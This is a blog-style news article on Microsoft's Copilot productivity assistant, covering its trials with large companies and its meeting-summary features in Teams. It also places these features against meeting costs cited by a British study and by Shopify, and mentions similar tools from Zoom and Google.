With businesses including General Motors, KPMG, and Goodyear, Microsoft has been testing Copilot, which assists users with tasks like email writing and coding. Early feedback from those companies has revealed that it is used to swiftly respond to emails and inquire about meetings. 

According to Jared Spataro, corporate vice president of modern work and business applications at Microsoft, “[Copilot] combines the power of large language models (LLMs) with your data…to turn your words into the most powerful productivity tool on the planet,” he said in a March blog post. 

Spataro promised that the technology would “lighten the load” for online users, stating that for many white-collar workers, “80% of our time is consumed with busywork that bogs us down.”

For many office workers, this so-called "busywork" includes attending meetings. According to a recent British study, office workers waste 213 hours annually, or 27 full working days, in meetings where the agenda could have been communicated by email.

Companies like Shopify are deliberately putting a stop to pointless meetings. When the e-commerce giant introduced an internal "cost calculator" for staff meetings, it made headlines during the summer. According to corporate leadership, each 30-minute meeting costs the company between $700 and $1,600.

Copilot will now help in reducing this expense. The AI assistant's services include the ability to "follow" meetings and produce a transcript, summary, and notes once they are over.

Microsoft, in July, noted that “the next wave of generative AI for Teams,” which included incorporating Copilot further into Teams calls and meetings.

“You can also ask Copilot to draft notes for you during the call and highlight key points, such as names, dates, numbers, and tasks using natural language commands[…]You can quickly synthesize key information from your chat threads—allowing you to ask specific questions (or use one of the suggested prompts) to help get caught up on the conversation so far, organize key discussion points, and summarize information relevant to you,” the company noted.

In regard to the same, Spataro states that “Every meeting is a productive meeting with Copilot in Teams[…]It can summarize key discussion points—including who said what and where people are aligned and where they disagree—and suggest action items, all in real-time during a meeting.

However, Microsoft is not the only tech giant working on making meeting tolerant, as Zoom and Google have also introduced AI-powered chatbots for the online workforce that can attend meetings on behalf of the user, and present its conclusions during the get-together.  

Read more »
Subscribe to: Comments (Atom)